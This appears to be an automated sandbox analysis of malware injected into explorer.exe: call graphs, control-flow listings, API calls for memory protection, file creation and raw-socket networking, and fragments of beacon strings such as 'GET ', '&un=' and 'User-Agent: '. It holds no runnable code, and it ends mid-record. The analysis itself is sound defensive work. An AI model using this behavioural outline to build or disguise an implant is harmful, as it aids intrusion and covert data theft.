13781->13782 13783 10e1e8f2 NtProtectVirtualMemory 13782->13783 13783->13779 13785 10e1e8f2 NtProtectVirtualMemory 13784->13785 13786 10e22597 13784->13786 13785->13786 13787 10e1e8f2 NtProtectVirtualMemory 13786->13787 13789 10e225bf 13786->13789 13787->13789 13788 10e226e1 13790 10e25382 ObtainUserAgentString 13788->13790 13791 10e1e8f2 NtProtectVirtualMemory 13789->13791 13792 10e226b9 13789->13792 13793 10e226e9 13790->13793 13791->13792 13792->13788 13794 10e1e8f2 NtProtectVirtualMemory 13792->13794 13794->13788 13866 10e2883a 13867 10e28841 13866->13867 13868 10e29f82 6 API calls 13867->13868 13870 10e288c5 13868->13870 13869 10e28906 13870->13869 13871 10e29232 NtCreateFile 13870->13871 13871->13869 13937 10e29f7a 13938 10e29fb8 13937->13938 13939 10e265b2 socket 13938->13939 13941 10e2a081 13938->13941 13948 10e2a022 13938->13948 13939->13941 13940 10e2a134 13942 10e26732 connect 13940->13942 13947 10e2a1b2 13940->13947 13940->13948 13941->13940 13943 10e2a117 getaddrinfo 13941->13943 13941->13948 13942->13947 13943->13940 13944 10e266b2 send 13946 10e2a729 13944->13946 13945 10e2a7f4 setsockopt recv 13945->13948 13946->13945 13946->13948 13947->13944 13947->13948 13795 10e220fb 13797 10e22137 13795->13797 13796 10e222d5 13797->13796 13798 10e1e8f2 NtProtectVirtualMemory 13797->13798 13799 10e2228a 13798->13799 13800 10e1e8f2 NtProtectVirtualMemory 13799->13800 13803 10e222a9 13800->13803 13801 10e222cd 13802 10e25382 ObtainUserAgentString 13801->13802 13802->13796 13803->13801 13804 10e1e8f2 NtProtectVirtualMemory 13803->13804 13804->13801 13825 10e260b9 13826 10e260ed 13825->13826 13828 10e261f0 13825->13828 13827 10e29f82 6 API calls 13826->13827 13826->13828 13827->13828 13829 10e248be 13831 10e248c3 13829->13831 13830 10e249a6 13831->13830 13832 10e24995 ObtainUserAgentString 13831->13832 13832->13830 13925 10e21fbf 13927 10e22016 13925->13927 13926 10e220f0 13927->13926 13930 10e220bb 13927->13930 13931 10e1e8f2 NtProtectVirtualMemory 13927->13931 13928 10e220e8 13929 10e25382 ObtainUserAgentString 13928->13929 13929->13926 13930->13928 13932 10e1e8f2 NtProtectVirtualMemory 13930->13932 13931->13930 13932->13928 13492 10e29f82 13493 10e29fb8 13492->13493 13496 10e2a081 13493->13496 13503 10e2a022 13493->13503 13504 10e265b2 13493->13504 13495 10e2a134 13502 10e2a1b2 13495->13502 13495->13503 13507 10e26732 13495->13507 13496->13495 13498 10e2a117 getaddrinfo 13496->13498 13496->13503 13498->13495 13500 10e2a7f4 setsockopt recv 13500->13503 13501 10e2a729 13501->13500 13501->13503 13502->13503 13510 10e266b2 13502->13510 13505 10e2660a socket 13504->13505 13506 10e265ec 13504->13506 13505->13496 13506->13505 13508 10e26788 connect 13507->13508 13509 10e2676a 13507->13509 13508->13502 13509->13508 13511 10e266e7 13510->13511 13512 10e26705 send 13510->13512 13511->13512 13512->13501 13872 10e2ae0a 13873 10e29942 13872->13873 13874 10e2ae45 NtProtectVirtualMemory 13873->13874 13875 10e2ae70 13874->13875 13953 10e2314a 13954 10e23153 13953->13954 13959 10e23174 13953->13959 13955 10e25382 ObtainUserAgentString 13954->13955 13957 10e2316c 13955->13957 13956 10e231e7 13958 10e1e0f2 6 API calls 13957->13958 13958->13959 13959->13956 13961 10e1e1f2 13959->13961 13962 10e1e20f 13961->13962 13963 10e1e2c9 13961->13963 13964 10e28f12 7 API calls 13962->13964 13966 10e1e242 13962->13966 13963->13959 13964->13966 13965 10e1e289 13965->13963 13968 10e1e0f2 6 API calls 13965->13968 13966->13965 13967 10e1f432 NtCreateFile 13966->13967 13967->13965 13968->13963 13833 10e2ba4d 13834 10e2ba53 13833->13834 13837 10e1f782 13834->13837 13836 10e2ba6b 13839 10e1f78f 13837->13839 13838 10e1f7ad 13838->13836 13839->13838 13841 10e24662 13839->13841 13842 10e2466b 13841->13842 13850 10e247ba 13841->13850 13843 10e1e0f2 6 API calls 13842->13843 13842->13850 13845 10e246ee 13843->13845 13844 10e24750 13847 10e2483f 13844->13847 13848 10e24791 13844->13848 13844->13850 13845->13844 13846 10e29f82 6 API calls 13845->13846 13846->13844 13849 10e29f82 6 API calls 13847->13849 13847->13850 13848->13850 13851 10e29f82 6 API calls 13848->13851 13849->13850 13850->13838 13851->13850 13486 10e2ae12 13487 10e2ae45 NtProtectVirtualMemory 13486->13487 13490 10e29942 13486->13490 13489 10e2ae70 13487->13489 13491 10e29967 13490->13491 13491->13487 13876 10e1f613 13877 10e1f620 13876->13877 13878 10e1f67e 13877->13878 13879 10e2ae12 NtProtectVirtualMemory 13877->13879 13879->13877 13805 10e23cd4 13807 10e23cd8 13805->13807 13806 10e24022 13807->13806 13808 10e23352 NtCreateFile 13807->13808 13809 10e23f0d 13808->13809 13809->13806 13810 10e23792 NtCreateFile 13809->13810 13810->13809 13904 10e21dd9 13906 10e21df0 13904->13906 13905 10e21ecd 13906->13905 13907 10e25382 ObtainUserAgentString 13906->13907 13907->13905 13513 10e1e2dd 13514 10e1e31a 13513->13514 13515 10e1e3fa 13514->13515 13516 10e1e328 SleepEx 13514->13516 13520 10e28f12 13514->13520 13529 10e1f432 13514->13529 13539 10e1e0f2 13514->13539 13516->13514 13516->13516 13521 10e28f48 13520->13521 13522 10e290e9 13521->13522 13527 10e29134 13521->13527 13528 10e29232 NtCreateFile 13521->13528 13545 10e29f82 13521->13545 13523 10e29125 13522->13523 13557 10e28842 13522->13557 13565 10e28922 13523->13565 13527->13514 13528->13521 13530 10e1f45b 13529->13530 13538 10e1f4c9 13529->13538 13531 10e29232 NtCreateFile 13530->13531 13530->13538 13532 10e1f496 13531->13532 13533 10e1f4c5 13532->13533 13577 10e1f082 13532->13577 13534 10e29232 NtCreateFile 13533->13534 13533->13538 13534->13538 13536 10e1f4b6 13536->13533 13586 10e1ef52 13536->13586 13538->13514 13540 10e1e109 13539->13540 13541 10e1e1d3 13539->13541 13591 10e1e012 13540->13591 13541->13514 13543 10e1e113 13543->13541 13544 10e29f82 6 API calls 13543->13544 13544->13541 13546 10e29fb8 13545->13546 13547 10e265b2 socket 13546->13547 13549 10e2a081 13546->13549 13556 10e2a022 13546->13556 13547->13549 13548 10e2a134 13550 10e26732 connect 13548->13550 13555 10e2a1b2 13548->13555 13548->13556 13549->13548 13551 10e2a117 getaddrinfo 13549->13551 13549->13556 13550->13555 13551->13548 13552 10e266b2 send 13554 10e2a729 13552->13554 13553 10e2a7f4 setsockopt recv 13553->13556 13554->13553 13554->13556 13555->13552 13555->13556 13556->13521 13558 10e2886d 13557->13558 13573 10e29232 13558->13573 13560 10e28906 13560->13522 13561 10e28888 13561->13560 13562 10e29f82 6 API calls 13561->13562 13563 10e288c5 13561->13563 13562->13563 13563->13560 13564 10e29232 NtCreateFile 13563->13564 13564->13560 13566 10e289c2 13565->13566 13567 10e29232 NtCreateFile 13566->13567 13570 10e289d6 13567->13570 13568 10e28a9f 13568->13527 13569 10e28a5d 13569->13568 13571 10e29232 NtCreateFile 13569->13571 13570->13568 13570->13569 13572 10e29f82 6 API calls 13570->13572 13571->13568 13572->13569 13574 10e2925c 13573->13574 13576 10e29334 13573->13576 13575 10e29410 NtCreateFile 13574->13575 13574->13576 13575->13576 13576->13561 13578 10e1f420 13577->13578 13579 10e1f0aa 13577->13579 13578->13536 13579->13578 13580 10e29232 NtCreateFile 13579->13580 13582 10e1f1f9 13580->13582 13581 10e1f3df 13581->13536 13582->13581 13583 10e29232 NtCreateFile 13582->13583 13584 10e1f3c9 13583->13584 13585 10e29232 NtCreateFile 13584->13585 13585->13581 13587 10e1ef70 13586->13587 13588 10e1ef84 13586->13588 13587->13533 13589 10e29232 NtCreateFile 13588->13589 13590 10e1f046 13589->13590 13590->13533 13592 10e1e031 13591->13592 13593 10e1e0cd 13592->13593 13594 10e29f82 6 API calls 13592->13594 13593->13543 13594->13593 13880 10e2ba1f 13881 10e2ba25 13880->13881 13884 10e1f5f2 13881->13884 13883 10e2ba3d 13885 10e1f5fb 13884->13885 13886 10e1f60e 13884->13886 13885->13886 13887 10e24662 6 API calls 13885->13887 13886->13883 13887->13886 13811 10e21edd 13813 10e21f06 13811->13813 13812 10e21fa4 13813->13812 13814 10e1e8f2 NtProtectVirtualMemory 13813->13814 13815 10e21f9c 13814->13815 13816 10e25382 ObtainUserAgentString 13815->13816 13816->13812

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 10e29f82-10e29fb6 1 10e29fd6-10e29fd9 0->1 2 10e29fb8-10e29fbc 0->2 4 10e2a8fe-10e2a90c 1->4 5 10e29fdf-10e29fed 1->5 2->1 3 10e29fbe-10e29fc2 2->3 3->1 6 10e29fc4-10e29fc8 3->6 7 10e29ff3-10e29ff7 5->7 8 10e2a8f6-10e2a8f7 5->8 6->1 9 10e29fca-10e29fce 6->9 10 10e29ff9-10e29ffd 7->10 11 10e29fff-10e2a000 7->11 8->4 9->1 12 10e29fd0-10e29fd4 9->12 10->11 13 10e2a00a-10e2a010 10->13 11->13 12->1 12->5 14 10e2a012-10e2a020 13->14 15 10e2a03a-10e2a060 13->15 14->15 16 10e2a022-10e2a026 14->16 17 10e2a062-10e2a066 15->17 18 10e2a068-10e2a07c call 10e265b2 15->18 16->8 19 10e2a02c-10e2a035 16->19 17->18 20 10e2a0a8-10e2a0ab 17->20 22 10e2a081-10e2a0a2 18->22 19->8 23 10e2a0b1-10e2a0b8 20->23 24 10e2a144-10e2a150 20->24 22->20 26 10e2a8ee-10e2a8ef 22->26 27 10e2a0e2-10e2a0f5 23->27 28 10e2a0ba-10e2a0dc call 10e29942 23->28 25 10e2a156-10e2a165 24->25 24->26 29 10e2a167-10e2a178 call 10e26552 25->29 30 10e2a17f-10e2a18f 25->30 26->8 27->26 32 10e2a0fb-10e2a101 27->32 28->27 29->30 34 10e2a191-10e2a1ad call 10e26732 30->34 35 10e2a1e5-10e2a21b 30->35 32->26 37 10e2a107-10e2a109 32->37 46 10e2a1b2-10e2a1da 34->46 41 10e2a22d-10e2a231 35->41 42 10e2a21d-10e2a22b 35->42 37->26 38 10e2a10f-10e2a111 37->38 38->26 45 10e2a117-10e2a132 getaddrinfo 38->45 43 10e2a233-10e2a245 41->43 44 10e2a247-10e2a24b 41->44 47 10e2a27f-10e2a280 42->47 43->47 48 10e2a261-10e2a265 44->48 49 10e2a24d-10e2a25f 44->49 45->24 50 10e2a134-10e2a13c 45->50 46->35 52 10e2a1dc-10e2a1e1 46->52 51 10e2a283-10e2a2e0 call 10e2ad62 call 10e27482 call 10e26e72 call 10e2b002 47->51 53 10e2a267-10e2a26b 48->53 54 10e2a26d-10e2a279 48->54 49->47 50->24 63 10e2a2e2-10e2a2e6 51->63 64 10e2a2f4-10e2a354 call 10e2ad92 51->64 52->35 53->51 53->54 54->47 63->64 65 10e2a2e8-10e2a2ef call 10e27042 63->65 69 10e2a35a-10e2a396 call 10e2ad62 call 10e2b262 call 10e2b002 64->69 70 10e2a48c-10e2a4b8 call 10e2ad62 call 10e2b262 64->70 65->64 85 10e2a3bb-10e2a3e9 call 10e2b262 * 2 69->85 86 10e2a398-10e2a3b7 call 10e2b262 call 10e2b002 69->86 79 10e2a4ba-10e2a4d5 70->79 80 10e2a4d9-10e2a590 call 10e2b262 * 3 call 10e2b002 * 2 call 10e27482 70->80 79->80 111 10e2a595-10e2a5b9 call 10e2b262 80->111 101 10e2a415-10e2a41d 85->101 102 10e2a3eb-10e2a410 call 10e2b002 call 10e2b262 85->102 86->85 105 10e2a442-10e2a448 101->105 106 10e2a41f-10e2a425 101->106 102->101 105->111 112 10e2a44e-10e2a456 105->112 109 10e2a467-10e2a487 call 10e2b262 106->109 110 10e2a427-10e2a43d 106->110 109->111 110->111 121 10e2a5d1-10e2a6ad call 10e2b262 * 7 call 10e2b002 call 10e2ad62 call 10e2b002 call 10e26e72 call 10e27042 111->121 122 10e2a5bb-10e2a5cc call 10e2b262 call 10e2b002 111->122 112->111 113 10e2a45c-10e2a45d 112->113 113->109 132 10e2a6af-10e2a6b3 121->132 122->132 135 10e2a6b5-10e2a6fa call 10e26382 call 10e267b2 132->135 136 10e2a6ff-10e2a72d call 10e266b2 132->136 152 10e2a8e6-10e2a8e7 135->152 143 10e2a72f-10e2a735 136->143 144 10e2a75d-10e2a761 136->144 143->144 148 10e2a737-10e2a74c 143->148 149 10e2a767-10e2a76b 144->149 150 10e2a90d-10e2a913 144->150 148->144 153 10e2a74e-10e2a754 148->153 156 10e2a771-10e2a773 149->156 157 10e2a8aa-10e2a8df call 10e267b2 149->157 154 10e2a779-10e2a784 150->154 155 10e2a919-10e2a920 150->155 152->26 153->144 160 10e2a756 153->160 161 10e2a786-10e2a793 154->161 162 10e2a795-10e2a796 154->162 155->161 156->154 156->157 157->152 160->144 161->162 165 10e2a79c-10e2a7a0 161->165 162->165 167 10e2a7a2-10e2a7af 165->167 168 10e2a7b1-10e2a7b2 165->168 167->168 170 10e2a7b8-10e2a7c4 167->170 168->170 173 10e2a7c6-10e2a7ef call 10e2ad92 call 10e2ad62 170->173 174 10e2a7f4-10e2a861 setsockopt recv 170->174 173->174 177 10e2a8a3-10e2a8a4 174->177 178 10e2a863 174->178 177->157 178->177 181 10e2a865-10e2a86a 178->181 181->177 184 10e2a86c-10e2a872 181->184 184->177 186 10e2a874-10e2a8a1 184->186 186->177 186->178
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: getaddrinforecvsetsockopt
                                                                                                  • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                  • API String ID: 1564272048-1117930895
                                                                                                  • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                  • Instruction ID: d82935a04c23d9b9cfaabbabc158ca29ee566d3883b75905950ff3f9058c143b
                                                                                                  • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                  • Instruction Fuzzy Hash: B152B031614B088FCB59EF69E4847EAB7E1FB58304F94462ED4AFC7152DE30A949CB81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 303 10e29232-10e29256 304 10e2925c-10e29260 303->304 305 10e298bd-10e298cd 303->305 304->305 306 10e29266-10e292a0 304->306 307 10e292a2-10e292a6 306->307 308 10e292bf 306->308 307->308 309 10e292a8-10e292ac 307->309 310 10e292c6 308->310 311 10e292b4-10e292b8 309->311 312 10e292ae-10e292b2 309->312 313 10e292cb-10e292cf 310->313 311->313 314 10e292ba-10e292bd 311->314 312->310 315 10e292d1-10e292f7 call 10e29942 313->315 316 10e292f9-10e2930b 313->316 314->313 315->316 320 10e29378 315->320 316->320 321 10e2930d-10e29332 316->321 324 10e2937a-10e293a0 320->324 322 10e293a1-10e293a8 321->322 323 10e29334-10e2933b 321->323 327 10e293d5-10e293dc 322->327 328 10e293aa-10e293d3 call 10e29942 322->328 325 10e29366-10e29370 323->325 326 10e2933d-10e29360 call 10e29942 323->326 325->320 332 10e29372-10e29373 325->332 326->325 329 10e29410-10e29458 NtCreateFile call 10e29172 327->329 330 10e293de-10e2940a call 10e29942 327->330 328->320 328->327 339 10e2945d-10e2945f 329->339 330->320 330->329 332->320 339->320 340 10e29465-10e2946d 339->340 340->320 341 10e29473-10e29476 340->341 342 10e29486-10e2948d 341->342 343 10e29478-10e29481 341->343 344 10e294c2-10e294ec 342->344 345 10e2948f-10e294b8 call 10e29942 342->345 343->324 351 10e294f2-10e294f5 344->351 352 10e298ae-10e298b8 344->352 345->320 350 10e294be-10e294bf 345->350 350->344 353 10e29604-10e29611 351->353 354 10e294fb-10e294fe 351->354 352->320 353->324 355 10e29500-10e29507 354->355 356 10e2955e-10e29561 354->356 359 10e29538-10e29559 355->359 360 10e29509-10e29532 call 10e29942 355->360 361 10e29616-10e29619 356->361 362 10e29567-10e29572 356->362 366 10e295e9-10e295fa 359->366 360->320 360->359 364 10e296b8-10e296bb 361->364 365 10e2961f-10e29626 361->365 367 10e295a3-10e295a6 362->367 368 10e29574-10e2959d call 10e29942 362->368 370 10e29739-10e2973c 364->370 371 10e296bd-10e296c4 364->371 373 10e29657-10e2966b call 10e2ae92 365->373 374 10e29628-10e29651 call 10e29942 365->374 366->353 367->320 369 10e295ac-10e295b6 367->369 368->320 368->367 369->320 377 10e295bc-10e295e6 369->377 381 10e29742-10e29749 370->381 382 10e297c4-10e297c7 370->382 378 10e296c6-10e296ef call 10e29942 371->378 379 10e296f5-10e29734 371->379 373->320 391 10e29671-10e296b3 373->391 374->320 374->373 377->366 378->352 378->379 401 10e29894-10e298a9 379->401 384 10e2977a-10e297bf 381->384 385 10e2974b-10e29774 call 10e29942 381->385 382->320 387 10e297cd-10e297d4 382->387 384->401 385->352 385->384 392 10e297d6-10e297f6 call 10e29942 387->392 393 10e297fc-10e29803 387->393 391->324 392->393 399 10e29805-10e29825 call 10e29942 393->399 400 10e2982b-10e29835 393->400 399->400 400->352 402 10e29837-10e2983e 400->402 401->324 402->352 406 10e29840-10e29886 402->406 406->401
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile
                                                                                                  • String ID: `
                                                                                                  • API String ID: 823142352-2679148245
                                                                                                  • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                  • Instruction ID: d6b443690b1a533f719c3e809d10a71e60e2276bfa44a5352769a23741e65a4d
                                                                                                  • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                  • Instruction Fuzzy Hash: 78225970A18A499FCB89DF29D4956AEF7E1FB98344F81122EE45ED3250DB30E851CB81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 447 10e2ae12-10e2ae38 448 10e2ae45-10e2ae6e NtProtectVirtualMemory 447->448 449 10e2ae40 call 10e29942 447->449 450 10e2ae70-10e2ae7c 448->450 451 10e2ae7d-10e2ae8f 448->451 449->448
                                                                                                  APIs
                                                                                                  • NtProtectVirtualMemory.NTDLL ref: 10E2AE67
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2706961497-0
                                                                                                  • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                  • Instruction ID: 67a6425e2cd6e64941831afb7955ea99665d1f097958555a061d6912d896db3a
                                                                                                  • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                  • Instruction Fuzzy Hash: 3F01B134628B884F8788EF6CE48122AB7E4FBCD314F000B3EE99AC3250EB70C5414B42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 452 10e2ae0a-10e2ae6e call 10e29942 NtProtectVirtualMemory 455 10e2ae70-10e2ae7c 452->455 456 10e2ae7d-10e2ae8f 452->456
                                                                                                  APIs
                                                                                                  • NtProtectVirtualMemory.NTDLL ref: 10E2AE67
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2706961497-0
                                                                                                  • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                  • Instruction ID: 2aeb6afc8dd09d97b1b0f9014288761434f97a2157f4392ce55c128ed3010ed1
                                                                                                  • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                  • Instruction Fuzzy Hash: 8501A234628B884B8748EB2C94412AAB3E5FBCE314F400B3EE9DAC3240DB21D5024B82
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • ObtainUserAgentString.URLMON ref: 10E249A0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AgentObtainStringUser
                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                  • API String ID: 2681117516-319646191
                                                                                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                  • Instruction ID: 9c420cef16df85dcba0e64e2319e45dd2187888c2e7d88904d06f46196bc570c
                                                                                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                  • Instruction Fuzzy Hash: B331F130A10A0C8FCF01EFA9D8857EEB7E1FB58204F80022AE45ED7240DF749A44C789
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • ObtainUserAgentString.URLMON ref: 10E249A0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AgentObtainStringUser
                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                  • API String ID: 2681117516-319646191
                                                                                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                  • Instruction ID: 736be2677d51e435af21927b43de70548c22e20c10214c8affb0dadf9ef10564
                                                                                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                  • Instruction Fuzzy Hash: 4D21D570A10A4D8BCF05DFA9D8457EEBBF1FF58204F80421AE45AD7240DF749645C785
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 232 10e20b66-10e20b68 233 10e20b93-10e20bb8 232->233 234 10e20b6a-10e20b6b 232->234 237 10e20bbb-10e20bbc 233->237 235 10e20bbe-10e20c22 call 10e27612 call 10e29942 * 2 234->235 236 10e20b6d-10e20b71 234->236 246 10e20c28-10e20c2b 235->246 247 10e20cdc 235->247 236->237 238 10e20b73-10e20b92 236->238 237->235 238->233 246->247 248 10e20c31-10e20cd3 call 10e2bda4 call 10e2b022 call 10e2b3e2 call 10e2b022 call 10e2b3e2 CreateMutexW 246->248 249 10e20cde-10e20cf6 247->249 248->247 263 10e20cd5-10e20cda 248->263 263->249
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateMutex
                                                                                                  • String ID: .dll$el32$kern
                                                                                                  • API String ID: 1964310414-1222553051
                                                                                                  • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                  • Instruction ID: 486bb1c6bee06f0bb06777fe1590ef00eab3c2bc9bd9030fa6220970c675ecb4
                                                                                                  • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                  • Instruction Fuzzy Hash: 18417C74918A088FDB84EFA8D8D5BAD7BE1FF58300F40417AD84AEB256DE309945CB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateMutex
                                                                                                  • String ID: .dll$el32$kern
                                                                                                  • API String ID: 1964310414-1222553051
                                                                                                  • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                  • Instruction ID: 1dc1542ffb48b34d2f9ef31307f437f1da30016ebab72cb805a55b23889fb906
                                                                                                  • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                  • Instruction Fuzzy Hash: 95416C74918A088FCB84EFA8D889BAD77E1FF68300F40416AD84AEB255DE309945CB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 293 10e2672e-10e26768 294 10e2676a-10e26782 call 10e29942 293->294 295 10e26788-10e267ab connect 293->295 294->295
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: connect
                                                                                                  • String ID: conn$ect
                                                                                                  • API String ID: 1959786783-716201944
                                                                                                  • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                  • Instruction ID: d8b4a59e20568fb3b78f410f122a59985db618452da655335b3176d1420a403d
                                                                                                  • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                  • Instruction Fuzzy Hash: D4010C74618B188FCB84EF5CE088B55B7E0EB59324F1545AEA90DCB266CA74D9818BC2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 298 10e26732-10e26768 299 10e2676a-10e26782 call 10e29942 298->299 300 10e26788-10e267ab connect 298->300 299->300
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: connect
                                                                                                  • String ID: conn$ect
                                                                                                  • API String ID: 1959786783-716201944
                                                                                                  • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                  • Instruction ID: a104f9508e8d440ee5a95ecdfbb1002d84a3624df4cf871dbdff5348e1211716
                                                                                                  • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                  • Instruction Fuzzy Hash: 39012C70618A1C8FCB84EF5CE088B55B7E0FB59324F1541AEA80DCB226CB74CD818BC2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 411 10e266b2-10e266e5 412 10e266e7-10e266ff call 10e29942 411->412 413 10e26705-10e2672d send 411->413 412->413
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
